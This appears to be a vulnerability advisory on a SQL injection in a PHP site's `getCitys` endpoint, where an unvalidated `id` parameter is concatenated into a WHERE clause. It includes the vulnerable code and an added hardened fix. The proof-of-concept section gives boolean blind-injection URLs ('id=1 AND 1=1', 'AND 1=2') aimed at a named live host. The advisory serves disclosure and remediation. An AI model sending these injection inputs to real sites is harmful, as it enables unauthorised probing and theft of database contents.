### Summary:
The `id` parameter is not cast to its expected type, so SQL injection is possible.
### Details:
In \app\controller\area.class.php the `id` parameter is read from the request without any processing, which leads to SQL injection:
```php
public function getCitys() {
    $aeraObj = M("area");
    $provinceId = $_GET["id"]; // no processing of any kind
    return $aeraObj->getCitysByProvinceId($provinceId);
}
```
\app\model\areaAction.class.php then uses the value directly in the SQL condition:
```php
public function getCitysByProvinceId($provinceId) {
    $type = $_GET['type'];
    // $provinceId is concatenated into the WHERE clause unprocessed
    $ary = $this->where("pid = ".$provinceId)->limit(1000)->find();
    // ... remainder of the function is not shown in the report
}
```
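A hardened version of both functions, added here as an example and not the vendor's code. It assumes the ThinkPHP-style Model API the original snippets use (M(), where(), limit(), find()) and that the array form of where() quotes its values instead of splicing them into the statement text; the class names `AreaAction` and `AreaController` and the `Model`/`Action` base classes are assumed.

```php
<?php
// Added example, not the vendor's code. Assumes the ThinkPHP-style Model
// API used in the report (M(), where(), limit(), find()) and that the array
// form of where() quotes/escapes values rather than concatenating them.

// Accept only a positive integer id. Anything else, including arrays
// (id[]=1) and strings such as "1 AND 1=1", is rejected outright rather
// than silently truncated by an intval() cast.
function parsePositiveInt($value) {
    if (is_string($value) && preg_match('/^[1-9][0-9]*$/', $value)) {
        return (int)$value;
    }
    return null;
}

// Model (\app\model\areaAction.class.php in the report); base class assumed.
class AreaAction extends Model {
    public function getCitysByProvinceId($provinceId) {
        $provinceId = parsePositiveInt($provinceId);
        if ($provinceId === null) {
            return array(); // invalid id: no query is built at all
        }
        // Array condition: the framework renders it as pid = <quoted value>,
        // so the request parameter never becomes part of the SQL text.
        return $this->where(array('pid' => $provinceId))->limit(1000)->find();
    }
}

// Controller (\app\controller\area.class.php in the report); base class assumed.
class AreaController extends Action {
    public function getCitys() {
        $areaObj = M("area");
        // Pass the raw value through; validation lives next to the query so
        // every caller of the model method gets the same check.
        $provinceId = isset($_GET['id']) ? $_GET['id'] : '';
        return $areaObj->getCitysByProvinceId($provinceId);
    }
}
```

Validating at the model layer is what closes the hole; an `intval()` at the controller alone would also stop this injection, but leaves any other caller of `getCitysByProvinceId()` unprotected.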
### Proof of concept:
Visiting http://www.teamcen.com/index.php?id=1&ac=area_getCitys displays normally.
Then http://www.teamcen.com/index.php?id=1 AND 1=1&ac=area_getCitys
![1=1.png](https://images.seebug.org/upload/201401/1323402565c151a9a447a9d8b69e9b1894d76dfd.png)
And then http://www.teamcen.com/index.php?id=1 AND 1=2&ac=area_getCitys
![1=2.png](https://images.seebug.org/upload/201401/132341064705121bc1aaedf2d009e45f03265f34.png)
In a local test, the number of administrator accounts can be determined to be 1:
![count=1.png](https://images.seebug.org/upload/201401/13234538e80634ca75be28f5eb8b018c775fb16c.png)
... and so on for the other blind-injection checks.